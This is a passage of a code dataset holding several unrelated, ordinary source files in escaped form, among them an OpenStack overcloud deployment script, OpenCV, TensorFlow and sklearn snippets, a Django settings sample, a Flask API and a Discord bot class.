dest=\"vlan_range\",\n required=True,\n help=\"The VLAN range to use for Neutron in \"\n \" xxx:yyy format\")\n parser.add_argument(\"--nic_env_file\",\n default=\"5_port/nic_environment.yaml\",\n help=\"The NIC environment file to use\")\n parser.add_argument(\"--ntp\",\n dest=\"ntp_server_fqdn\",\n default=\"0.centos.pool.ntp.org\",\n help=\"The FQDN of the ntp server to use\")\n parser.add_argument(\"--timezone\",\n dest=\"time_zone\",\n default=\"America/Chicago\",\n help=\"The timezone to use\")\n parser.add_argument(\"--timeout\",\n default=\"300\",\n help=\"The amount of time in minutes to allow the \"\n \"overcloud to deploy\")\n parser.add_argument(\"--overcloud_name\",\n default=None,\n help=\"The name of the overcloud\")\n parser.add_argument(\"--hugepages_size\",\n dest=\"hugepages_size\",\n required=False,\n default=\"1GB\",\n help=\"HugePages size\")\n parser.add_argument(\"--hostos_cpu_count\",\n dest=\"hostos_cpu_count\",\n required=False,\n default=\"4\",\n help=\"HostOs Cpus to be 
configured\")\n parser.add_argument('--enable_dellsc',\n action='store_true',\n default=False,\n help=\"Enable cinder Dell Storage Center backend\")\n parser.add_argument('--enable_unity',\n action='store_true',\n default=False,\n help=\"Enable Dell EMC Unity backend\")\n parser.add_argument('--enable_unity_manila',\n action='store_true',\n default=False,\n help=\"Enable Dell EMC Unity Manila backend\")\n parser.add_argument('--enable_powermax',\n action='store_true',\n default=False,\n help=\"Enable Dell EMC Powermax backend\")\n parser.add_argument('--powermax_protocol',\n dest='powermax_protocol',\n required=False,\n default=\"iSCSI\",\n help=\"Dell EMC Powermax Protocol - iSCSI or FC\")\n parser.add_argument('--enable_powermax_manila',\n action='store_true',\n default=False,\n help=\"Enable Dell EMC PowerMax Manila backend\")\n parser.add_argument('--disable_rbd',\n action='store_true',\n default=False,\n help=\"Disable cinder Ceph and rbd backend\")\n parser.add_argument('--octavia_enable',\n action='store_true',\n default=False,\n help=\"Enables Octavia Load Balancer\")\n parser.add_argument('--octavia_user_certs_keys',\n action='store_true',\n default=False,\n help=\"Enables Octavia Load Balancer with \"\n \"user provided certs and keys\")\n parser.add_argument('--dvr_enable',\n action='store_true',\n default=False,\n help=\"Enables Distributed Virtual Routing\")\n parser.add_argument('--barbican_enable',\n action='store_true',\n default=False,\n help=\"Enables Barbican key manager\")\n parser.add_argument('--static_ips',\n action='store_true',\n default=False,\n help=\"Specify the IPs on the overcloud nodes\")\n parser.add_argument('--static_vips',\n action='store_true',\n default=False,\n help=\"Specify the VIPs for the networks\")\n parser.add_argument('--ovs_dpdk',\n action='store_true',\n default=False,\n help=\"Enable OVS+DPDK\")\n parser.add_argument('--sriov',\n action='store_true',\n default=False,\n help=\"Enable SR-IOV\")\n parser.add_argument('--hw_offload',\n action='store_true',\n default=False,\n help=\"Enable SR-IOV Offload\")\n parser.add_argument('--sriov_interfaces',\n dest=\"sriov_interfaces\",\n default=False,\n help=\"SR-IOV interfaces count\")\n parser.add_argument('--node_placement',\n action='store_true',\n default=False,\n help=\"Control which physical server is assigned \"\n \"which instance\")\n parser.add_argument(\"--debug\",\n default=False,\n action='store_true',\n help=\"Indicates if the deploy-overcloud script \"\n \"should be run in debug mode\")\n parser.add_argument(\"--mtu\",\n dest=\"mtu\",\n type=int,\n required=True,\n default=1500,\n help=\"Tenant Network MTU\")\n parser.add_argument(\"--dashboard_enable\",\n action='store_true',\n default=False,\n help=\"Enable the ceph dashboard deployment\")\n parser.add_argument('--network_data',\n action='store_true',\n default=False,\n help=\"Use network_data.yaml to create edge site \"\n \"networks\")\n\n LoggingHelper.add_argument(parser)\n args = parser.parse_args()\n LoggingHelper.configure_logging(args.logging_level)\n p = re.compile('\\d+:\\d+') # noqa: W605\n if not p.match(args.vlan_range):\n raise ValueError(\"Error: The VLAN range must be a number followed \"\n \"by a colon, followed by another number\")\n os_auth_url, os_tenant_name, os_username, os_password, \\\n os_user_domain_name, os_project_domain_name = \\\n CredentialHelper.get_undercloud_creds()\n\n # Set up the default flavors\n control_flavor = \"control\"\n ceph_storage_flavor = \"ceph-storage\"\n swift_storage_flavor = 
\"swift-storage\"\n block_storage_flavor = \"block-storage\"\n\n if args.node_placement:\n validate_node_placement()\n\n # If node-placement is specified, then the baremetal flavor must\n # be used\n control_flavor = BAREMETAL_FLAVOR\n ceph_storage_flavor = BAREMETAL_FLAVOR\n swift_storage_flavor = BAREMETAL_FLAVOR\n block_storage_flavor = BAREMETAL_FLAVOR\n\n # Validate that the NIC envronment file exists\n nic_env_file = os.path.join(home_dir,\n \"pilot/templates/nic-configs\",\n args.nic_env_file)\n if not os.path.isfile(nic_env_file):\n raise ValueError(\"\\nError: The nic_env_file {} does not \"\n \"exist!\".format(nic_env_file))\n\n # Apply any patches required on the Director itself. This is done each\n # time the overcloud is deployed (instead of once, after the Director\n # is installed) in order to ensure an update to the Director doesn't\n # overwrite the patch.\n # logger.info(\"Applying patches to director...\")\n # cmd = os.path.join(home_dir, 'pilot', 'patch-director.sh')\n # status = os.system(cmd)\n # if status != 0:\n # raise ValueError(\"\\nError: {} failed, unable to continue. See \"\n # \"the comments in that file for additional \"\n # \"information\".format(cmd))\n # Pass the parameters required by puppet which will be used\n # to enable/disable dell nfv features\n # Edit the dellnfv_environment.yaml\n # If disabled, default values will be set and\n # they won't be used for configuration\n # Create ConfigOvercloud object\n print(\"Configure environment file\")\n config = ConfigOvercloud(args.overcloud_name)\n # Remove this when Numa siblings added\n # Edit the dellnfv_environment.yaml\n config.edit_environment_files(\n args.mtu,\n args.enable_hugepages,\n args.enable_numa,\n args.hugepages_size,\n args.hostos_cpu_count,\n args.ovs_dpdk,\n args.sriov,\n args.hw_offload,\n args.sriov_interfaces,\n nic_env_file,\n args.num_controllers,\n args.num_storage,\n control_flavor,\n ceph_storage_flavor,\n swift_storage_flavor,\n block_storage_flavor,\n args.vlan_range,\n args.time_zone,\n args.num_dell_computes,\n args.num_dell_computeshci,\n args.num_powerflex\n )\n\n # Launch the deployment\n overcloud_name_opt = \"\"\n if args.overcloud_name is not None:\n overcloud_name_opt = \"--stack \" + args.overcloud_name\n\n debug = \"\"\n if args.debug:\n debug = \"--debug\"\n\n # The order of the environment files is important as a later inclusion\n # overrides resources defined in prior inclusions.\n\n env_opts = \"\"\n # If there are edge sites we have to use network_data.yaml and\n # it must in as first argument.\n if args.network_data:\n env_opts += \"-n ~/pilot/templates/network_data.yaml \"\n # The roles_data.yaml must be included at the beginning.\n # This is needed to enable the custom role Dell Compute.\n # It overrides the default roles_data.yaml\n env_opts += \"-r ~/pilot/templates/roles_data.yaml\"\n\n # The static-ip-environment.yaml must be included after the\n # network-environment.yaml\n if args.static_ips:\n env_opts += \" -e ~/pilot/templates/static-ip-environment.yaml\"\n\n # The static-vip-environment.yaml must be included after the\n # network-environment.yaml\n if args.static_vips:\n env_opts += \" -e ~/pilot/templates/static-vip-environment.yaml\"\n\n # The configure-barbican.yaml must be included after the\n # network-environment.yaml\n if args.barbican_enable:\n env_opts += \" -e ~/pilot/templates/configure-barbican.yaml\"\n\n # The octavia.yaml must be included after the\n # network-environment.yaml\n if args.octavia_enable:\n env_opts += \" -e 
~/pilot/templates/octavia.yaml\"\n if args.octavia_user_certs_keys is True:\n env_opts += \" -e ~/pilot/templates/cert_keys.yaml\"\n\n if args.node_placement:\n env_opts += \" -e ~/pilot/templates/node-placement.yaml\"\n\n # The neutron-ovs.yaml must be included before dell-environment.yaml to enable ovs and disable ovn\n # in OSP16.1. In case we need to use OVN in future, please delete this line\n env_opts += \" -e ~/pilot/templates/overcloud/environments/services/neutron-ovs.yaml\"\n\n # The neutron-ovs-dvr.yaml.yaml must be included after the\n # neutron-ovs.yaml\n if args.dvr_enable:\n env_opts += \" -e ~/pilot/templates/neutron-ovs-dvr.yaml\"\n\n # The dell-environment.yaml must be included after the\n # storage-environment.yaml and ceph-radosgw.yaml\n if args.num_powerflex > 0:\n env_opts += \" -e ~/containers-prepare-parameter.yaml\" \\\n \" -e ~/pilot/templates/dell-environment.yaml\"\n else:\n env_opts += \" -e ~/pilot/templates/overcloud/environments/\" \\\n \"storage-environment.yaml\" \\\n \" -e ~/containers-prepare-parameter.yaml\" \\\n \" -e ~/pilot/templates/dell-environment.yaml\"\n\n host_config = False\n if args.enable_hugepages or args.enable_numa:\n env_opts += \" -e ~/pilot/templates/overcloud/environments/\" \\\n \"host-config-and-reboot.yaml\"\n host_config = True\n if args.ovs_dpdk:\n if not args.enable_hugepages or not args.enable_numa:\n raise ValueError(\"Both hugepages and numa must be\" +\n \"enabled in order to use OVS-DPDK\")\n else:\n env_opts += \" -e ~/pilot/templates/neutron-ovs-dpdk.yaml\"\n\n if args.sriov:\n env_opts += \" -e ~/pilot/templates/neutron-sriov.yaml\"\n if args.hw_offload:\n env_opts += \" -e ~/pilot/templates/ovs-hw-offload.yaml\"\n if not host_config:\n env_opts += \" -e ~/pilot/templates/overcloud/environments/\" \\\n \"host-config-and-reboot.yaml\"\n\n if args.enable_dellsc:\n env_opts += \" -e ~/pilot/templates/dellsc-cinder-config.yaml\"\n\n if args.enable_unity:\n env_opts += \" -e ~/pilot/templates/dellemc-unity-cinder-\" \\\n \"container.yaml\"\n env_opts += \" -e ~/pilot/templates/dellemc-unity-cinder-\" \\\n \"backend.yaml\"\n\n if args.enable_unity_manila:\n env_opts += \" -e ~/pilot/templates/unity-manila-container.yaml\"\n env_opts += \" -e ~/pilot/templates/unity-manila-config.yaml\"\n\n if args.enable_powermax:\n if args.powermax_protocol == \"iSCSI\":\n env_opts += \" -e ~/pilot/templates/dellemc-powermax-iscsi-cinder-\" \\\n \"backend.yaml\"\n else:\n env_opts += \" -e ~/pilot/templates/dellemc-powermax-fc-cinder-\" \\\n \"backend.yaml\"\n if args.enable_powermax_manila:\n env_opts += \" -e ~/pilot/templates/powermax-manila-config.yaml\"\n\n if args.num_powerflex > 0:\n env_opts += \" -e ~/pilot/templates/overcloud/environments/powerflex-ansible/powerflex-ansible.yaml\"\n env_opts += \" -e ~/pilot/templates/dellemc-powerflex-cinder-backend.yaml\"\n env_opts += \" -e ~/pilot/templates/custom-dellemc-volume-mappings.yaml\"\n else:\n env_opts += \" -e /usr/share/openstack-tripleo-heat-templates/environments/ceph-ansible/ceph-ansible.yaml\" \\\n \" -e /usr/share/openstack-tripleo-heat-templates/environments/ceph-ansible/ceph-rgw.yaml\"\n \n if args.dashboard_enable:\n env_opts += \" -e /usr/share/openstack-tripleo-heat-templates/environments/ceph-ansible/ceph-dashboard.yaml\"\n env_opts += \" -e ~/pilot/templates/ceph_dashboard_admin.yaml\"\n\n # The network-environment.yaml must be included after other templates\n # for effective parameter overrides (External vlan default route)\n # The network-environment.yaml must be 
included after the network-isolation.yaml\n        env_opts += \" -e ~/pilot/templates/overcloud/environments/\" \\\n \"network-isolation.yaml\" \\\n \" -e ~/pilot/templates/network-environment.yaml\" \\\n \" -e {} \" \\\n \"-e ~/pilot/templates/site-name.yaml\".format(nic_env_file)\n\n cmd = \"cd ;source ~/stackrc; openstack overcloud deploy\" \\\n \" {}\" \\\n \" --log-file ~/pilot/overcloud_deployment.log\" \\\n \" -t {}\" \\\n \" {}\" \\\n \" --templates ~/pilot/templates/overcloud\" \\\n \" {}\" \\\n \" --libvirt-type kvm\" \\\n \" --no-cleanup\" \\\n \" --ntp-server {}\" \\\n \"\".format(debug,\n args.timeout,\n overcloud_name_opt,\n env_opts,\n args.ntp_server_fqdn,\n )\n with open(os.path.join(home_dir, 'pilot', 'overcloud_deploy_cmd.log'),\n 'w') as f:\n f.write(cmd.replace(' -', ' \\\\\\n -'))\n f.write('\\n')\n start = time.time()\n status = run_deploy_command(cmd)\n end = time.time()\n logger.info('\\nExecution time: {} (hh:mm:ss)'.format(\n time.strftime('%H:%M:%S', time.gmtime(end - start))))\n logger.info('Fetching SSH keys...')\n\n update_ssh_config()\n if status == 0:\n horizon_url = finalize_overcloud()\n logger.info(\"\\nDeployment Completed\")\n else:\n horizon_url = None\n\n logger.info('Overcloud nodes:')\n identify_nodes()\n\n if horizon_url:\n logger.info('\\nHorizon Dashboard URL: {}\\n'.format(horizon_url))\n except Exception as err:\n print(err, file=sys.stderr)\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/pilot/deploy-overcloud.py","file_name":"deploy-overcloud.py","file_ext":"py","file_size_in_byte":28771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"349420722","text":"import cv2\nimport numpy as np\ndef findCenter():\n\n X = []\n img = cv2.imread('/home/purvikpatel_/catkin_ws/src/img_processing/scripts/image.png', 1)\n hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(hsv,(88,100,100),(130,255,255))\n inv = cv2.bitwise_not(mask)\n inv = cv2.GaussianBlur(inv,(15,15),0)\n res = cv2.bitwise_and(hsv,hsv,mask = inv)\n kernel = np.ones((5,5),np.uint8)\n res = cv2.erode(res,kernel,iterations=1)\n res = cv2.cvtColor(res,cv2.COLOR_HSV2BGR)\n res = cv2.cvtColor(res,cv2.COLOR_BGR2GRAY)\n\n _, contours , _ = cv2.findContours(res,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n for contour in contours:\n x = cv2.moments(contour)\n if x['m00']!=0:\n cX = int(x['m10']/x['m00'])\n cY = int(x['m01']/x['m00'])\n else:\n cX,cY = 0,0\n X.append(cX)\n X.append(cY)\n \n\n return X\n","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"371899715","text":"#!/usr/bin/python3\r\nimport math\r\n\r\ndef errortest(x, y):\r\n while True:\r\n try:\r\n x = int(input('Number 1: '))\r\n y = int(input('Number 2: '))\r\n except ValueError:\r\n print('Please enter two non-zero positive integers.')\r\n continue\r\n else:\r\n break\r\n return x, y\r\n\r\ndef prim(num_prime):\r\n for num_prime in range(2,num_prime):\r\n if all(num_prime%i!=0 for i in range(2, int(math.sqrt(num_prime))+1)):\r\n print(num_prime)\r\n\r\ndef gcd(x,y):\r\n while y != x:\r\n if x > y:\r\n x -= y\r\n elif y > x:\r\n y -= x\r\n print(y)\r\n\r\ndef basic(x, op, z):\r\n if op == '+':\r\n ans = x + z\r\n elif op == '-':\r\n ans = x - z\r\n elif op == '*':\r\n ans = x * z\r\n elif op == '/':\r\n ans = x / z\r\n return ans\r\n\r\ndef factorial(n):\r\n if n == 0:\r\n return 1\r\n else:\r\n return n * factorial(n - 1)\r\n
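\r\n# Example usage (a sketch, not part of the original script; kept commented\r\n# out so the interactive loop below is the only thing that runs):\r\n# assert basic(2.0, '+', 3.0) == 5.0\r\n# assert basic(10, '/', 4) == 2.5\r\n# gcd(12, 18) # prints 6\r\n# print(factorial(5)) # 120\r\n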
\r\nwhile True:\r\n fun = input('Function: ')\r\n fun = fun.upper()\r\n\r\n if fun == 'BASIC':\r\n num_1 = float(input('Number 1: '))\r\n function = str(input('Function: '))\r\n num_2 = float(input('Number 2: '))\r\n ans = basic(num_1, function, num_2)\r\n print(ans)\r\n","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"307224650","text":"import os\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\n\n\ndef init():\n global model\n global input_width\n global input_height\n\n # AZUREML_MODEL_DIR is an environment variable created during deployment\n model_path = os.path.join(os.environ[\"AZUREML_MODEL_DIR\"], \"model\")\n\n # load the model\n model = load_model(model_path)\n input_width = 244\n input_height = 244\n\n\ndef decode_img(file_path):\n file = tf.io.read_file(file_path)\n img = tf.io.decode_jpeg(file, channels=3)\n img = tf.image.resize(img, [input_width, input_height])\n return img / 255.0\n
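\n# A hedged aside (not in the original driver): tf.data maps can usually be\n# parallelized and prefetched, e.g. on recent TF versions\n# ds.map(decode_img, num_parallel_calls=tf.data.AUTOTUNE).batch(64).prefetch(tf.data.AUTOTUNE)\n# (older releases spell it tf.data.experimental.AUTOTUNE).\n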
\n\ndef run(mini_batch):\n images_ds = tf.data.Dataset.from_tensor_slices(mini_batch)\n images_ds = images_ds.map(decode_img).batch(64)\n\n # perform inference\n pred = model.predict(images_ds)\n\n # Compute per-sample probabilities and predicted classes\n pred_prob = tf.math.reduce_max(tf.math.softmax(pred, axis=-1), axis=-1).numpy()\n pred_class = tf.math.argmax(pred, axis=-1).numpy()\n\n return pd.DataFrame(\n {\n \"file\": mini_batch,\n \"class\": pred_class,\n \"probability\": pred_prob,\n }\n )\n","sub_path":"sdk/python/endpoints/batch/deploy-models/imagenet-classifier/code/score-by-batch/batch_driver.py","file_name":"batch_driver.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"524777168","text":"# SECURITY WARNING: keep the secret key used in production secret!\nimport os\n\nfrom quarantined_backend.settings import BASE_DIR\n\nSECRET_KEY = \"%5r@$^)+$$#$%ˆˆ%ˆˆˆˆ%$%%$&ˆˆFFDFDSFSDF@$@#DSSFDZzzzSAe3n%fm_\"\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n# We do not support sqlite anymore\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.contrib.gis.db.backends.postgis\",\n \"NAME\": \"DATABASE_NAME\",\n \"USER\": \"DATABASE_USER\",\n \"PASSWORD\": \"DATABASE_PASSWORD\",\n \"HOST\": \"DATABASE_HOST\",\n \"PORT\": \"\",\n }\n}\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\nSTATIC_URL = \"/static/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static/\")\n\nALLOWED_HOSTS = []\n\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nif not DEBUG:\n sentry_sdk.init(\n dsn=\"sentrydsn\",\n integrations=[DjangoIntegration()],\n # If you wish to associate users to errors (assuming you are using\n # django.contrib.auth) you may enable sending PII data.\n send_default_pii=True,\n )\n\n ANYMAIL = {\"SENDINBLUE_API_KEY\": \"\"}\n DEFAULT_FROM_EMAIL = \"no-reply@quarantine-help.space\"\n SERVER_EMAIL = \"no-reply@quarantine-help.space\"\n","sub_path":"quarantined_backend/local_settings_sample.py","file_name":"local_settings_sample.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"503519542","text":"# -*- coding: utf-8 -*-\nimport pyyandexmusic\nym = pyyandexmusic.YandexMusic()\n\ntrack_resp = ym.search(\"Amon Amarth\")\n# Find tracks by keyword. Note that when searching\n# for tracks the search_type parameter\n# can be omitted.\noffset_track_resp = ym.search(\"Mozart\", offset=2)\n# Since the results for the query Mozart span more than\n# one page, this pagination has to be taken into account\n# when searching. For that we use the offset parameter,\n# which returns results shifted by the given number of\n# pages, 2 in our case. Keep in mind\n# that numbering starts at 0\nartists_resp = ym.search(\"Mozart\", \"artists\")\n# Find artists by the keyword Mozart.\n","sub_path":"example/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"529762462","text":"from discord.ext.commands import Bot\n\n\nclass BaseBot(Bot):\n def __init__(self, config, command_prefix, *args, **kwargs):\n super(BaseBot, self).__init__(command_prefix, *args, **kwargs)\n self.config = config\n self.owner = str(config['owner'])\n\n async def on_ready(self):\n self.load_extension('cmds')\n print('Logged in as {0} {0.id}'.format(self.user))\n\n async def add_role(self, user, role, server=None):\n if not isinstance(user, str):\n user_id = user.id\n server_id = user.server.id\n\n else:\n user_id = user\n server_id = server.id if not isinstance(server, str) else server\n\n role_id = role.id if not isinstance(role, str) else role\n\n await self.http.add_role(server_id, user_id, role_id)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"484913835","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport input_data\r\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\ndef add_layer(inputs,in_size,out_size,activation_function = None):\r\n Weights = tf.Variable(tf.random.normal([in_size,out_size]))\r\n biases = tf.Variable(tf.zeros([1,out_size])+0.1)\r\n \r\n Wx_plus_b = tf.matmul(inputs,Weights)+biases\r\n if activation_function is None:\r\n outputs = Wx_plus_b\r\n else:\r\n outputs = activation_function(Wx_plus_b)\r\n return outputs\r\n\r\ndef compute_accuracy(v_xs,v_ys,i):\r\n global prediction\r\n y_pre = sess.run(prediction,feed_dict={xs:v_xs})\r\n # x = v_xs[i,:]\r\n # img = x.reshape(28,28)\r\n # plt.imshow(img)\r\n # plt.show()\r\n # y = y_pre[i,:]\r\n # print(y.argmax())\r\n correct_prediction = tf.equal(tf.argmax(y_pre,1),tf.argmax(v_ys,1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\r\n result = sess.run(accuracy,feed_dict={xs:v_xs,ys:v_ys})\r\n return result\r\n\r\nxs = tf.compat.v1.placeholder(tf.float32,[None,784])\r\nys = tf.compat.v1.placeholder(tf.float32,[None,10])\r\n\r\nprediction = add_layer(xs, 784, 10, activation_function = tf.nn.softmax)\r\n\r\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(ys*tf.math.log(prediction),\r\n reduction_indices = [1])) #loss\r\ntrain_step = tf.compat.v1.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\r\nsess = tf.compat.v1.Session()\r\n\r\nsess.run(tf.compat.v1.global_variables_initializer())\r\n\r\nfor i in range(1000):\r\n batch_xs,batch_ys = mnist.train.next_batch(100)\r\n #print(batch_ys.shape)\r\n #print(batch_xs.shape)\r\n sess.run(train_step,feed_dict={xs:batch_xs,ys:batch_ys})\r\n if i%50 == 0:\r\n print(compute_accuracy(mnist.test.images,mnist.test.labels,i))\r\n 
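# A sketch (assumption, not in the original file): to eyeball one test\r\n # digit the way the commented block in compute_accuracy intended:\r\n # pred = sess.run(prediction, feed_dict={xs: mnist.test.images[:1]})\r\n # plt.imshow(mnist.test.images[0].reshape(28, 28)); plt.show()\r\n # print(pred.argmax())\r\n 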
#compute_accuracy(mnist.test.images,mnist.test.labels,i)\r\n","sub_path":"tensorflow_test/eg_3.py","file_name":"eg_3.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"496886393","text":"def appendAndDelete(s, t, k):\n nsame = min(len(s), len(t))\n for i in range(len(t)):\n if s[:i] != t[:i]:\n nsame = i-1\n break\n\n diff = len(s)-nsame + len(t)-nsame\n if (diff <= k and diff%2 == k%2) or len(s) + len(t) < k :\n return 'Yes'\n else:\n return 'No'\n","sub_path":"Problem Solving - Algorithms/Append_and_Delete.py","file_name":"Append_and_Delete.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"217071735","text":"from __future__ import with_statement\n\nimport os\nimport tempfile\n\nfrom django.core.files.base import ContentFile\nfrom django.db import models\nfrom django.test import TestCase\n\nfrom imagekit import utils\nfrom imagekit.lib import Image\nfrom imagekit.models import ImageSpec\nfrom imagekit.processors import Adjust\nfrom imagekit.processors.resize import Crop, SmartCrop\n\n\nclass Photo(models.Model):\n original_image = models.ImageField(upload_to='photos')\n\n thumbnail = ImageSpec([Adjust(contrast=1.2, sharpness=1.1), Crop(50, 50)],\n image_field='original_image', format='JPEG',\n options={'quality': 90})\n\n smartcropped_thumbnail = ImageSpec([Adjust(contrast=1.2, sharpness=1.1), SmartCrop(50, 50)],\n image_field='original_image', format='JPEG',\n options={'quality': 90})\n\n\nclass IKTest(TestCase):\n def generate_image(self):\n tmp = tempfile.TemporaryFile()\n Image.new('RGB', (800, 600)).save(tmp, 'JPEG')\n tmp.seek(0)\n return tmp\n\n def generate_lenna(self):\n \"\"\"\n See also:\n\n http://en.wikipedia.org/wiki/Lenna\n http://sipi.usc.edu/database/database.php?volume=misc&image=12\n\n \"\"\"\n tmp = tempfile.TemporaryFile()\n lennapath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'assets', 'lenna-800x600-white-border.jpg')\n with open(lennapath, \"r+b\") as lennafile:\n Image.open(lennafile).save(tmp, 'JPEG')\n tmp.seek(0)\n return tmp\n\n def create_photo(self, name):\n photo = Photo()\n img = self.generate_lenna()\n file = ContentFile(img.read())\n photo.original_image = file\n photo.original_image.save(name, file)\n photo.save()\n img.close()\n return photo\n\n def setUp(self):\n self.photo = self.create_photo('test.jpg')\n\n def test_nodelete(self):\n \"\"\"Don't delete the spec file when the source image hasn't changed.\n\n \"\"\"\n filename = self.photo.thumbnail.file.name\n thumbnail_timestamp = os.path.getmtime(filename)\n self.photo.save()\n self.assertTrue(self.photo.thumbnail.storage.exists(filename))\n\n def test_save_image(self):\n photo = Photo.objects.get(id=self.photo.id)\n self.assertTrue(os.path.isfile(photo.original_image.path))\n\n def test_setup(self):\n self.assertEqual(self.photo.original_image.width, 800)\n self.assertEqual(self.photo.original_image.height, 600)\n\n def test_thumbnail_creation(self):\n photo = Photo.objects.get(id=self.photo.id)\n self.assertTrue(os.path.isfile(photo.thumbnail.file.name))\n\n def test_thumbnail_size(self):\n \"\"\" Explicit and smart-cropped thumbnail size \"\"\"\n self.assertEqual(self.photo.thumbnail.width, 50)\n self.assertEqual(self.photo.thumbnail.height, 50)\n self.assertEqual(self.photo.smartcropped_thumbnail.width, 50)\n self.assertEqual(self.photo.smartcropped_thumbnail.height, 50)\n\n def 
test_thumbnail_source_file(self):\n self.assertEqual(\n self.photo.thumbnail.source_file, self.photo.original_image)\n\n\nclass IKUtilsTest(TestCase):\n def test_extension_to_format(self):\n self.assertEqual(utils.extension_to_format('.jpeg'), 'JPEG')\n self.assertEqual(utils.extension_to_format('.rgba'), 'SGI')\n\n with self.assertRaises(utils.UnknownExtensionError):\n utils.extension_to_format('.txt')\n\n def test_format_to_extension_no_init(self):\n self.assertEqual(utils.format_to_extension('PNG'), '.png')\n self.assertEqual(utils.format_to_extension('ICO'), '.ico')\n\n with self.assertRaises(utils.UnknownFormatError):\n utils.format_to_extension('TXT')\n","sub_path":"tests/core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"375601820","text":"#!/usr/bin/python3\n\"\"\"Starts flask\"\"\"\nfrom flask import Flask, make_response, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom models import storage\nfrom api.v1.views import app_views\nimport os\napp = Flask(__name__)\napp.register_blueprint(app_views)\nhost = os.getenv('HBNB_API_HOST', '0.0.0.0')\nport = os.getenv('HBNB_API_PORT', 5000)\nCORS(app)\n\n\n@app.teardown_appcontext\ndef tear_down(exc=None):\n \"\"\"Tears down the application\"\"\"\n storage.close()\n\n\n@app.errorhandler(404)\ndef not_found(error):\n \"\"\"404 not found response\"\"\"\n return make_response(jsonify({'error': 'Not found'}), 404)\n\nif __name__ == '__main__':\n app.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\n app.run(host=host, port=port, threaded=True)\n","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"164878772","text":"from sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\n#from sklearn.cross_validation import train_test_split\nfrom sklearn import metrics \nfrom sklearn.metrics import classification_report\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import SVC\n\ndef logistic_regression(X_train,X_test,y_train,y_test):\n LogReg = LogisticRegression()\n sc = StandardScaler()\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n LogReg.fit(X_train, y_train)\n y_predL = LogReg.predict(X_test)\n # Print the Accuracy of our Model.\n print('Correct Prediction Logistic Regression (%): ', accuracy_score(y_test, LogReg.predict(X_test), normalize = True) * 100.0)\n return y_predL , LogReg\n\n\ndef svc(X_train,X_test,y_train,y_test):\n sc = StandardScaler()\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n svc_classifier = SVC(kernel = 'linear', random_state = 0)\n svc_classifier.fit(X_train, y_train)\n y_predS = svc_classifier.predict(X_test)\n # Print the Accuracy of our Model.\n print('Correct Prediction SVC (%): ', accuracy_score(y_test, svc_classifier.predict(X_test), normalize = True) * 100.0)\n return y_predS , svc_classifier\n","sub_path":"Classification_Algo.py","file_name":"Classification_Algo.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"464109161","text":"import talon\n# don't forget to init the library first\n# it loads machine learning classifiers\ntalon.init()\n\nfrom talon import signature\n\n\nmessage = \"\"\"Thanks Sasha, I can't 
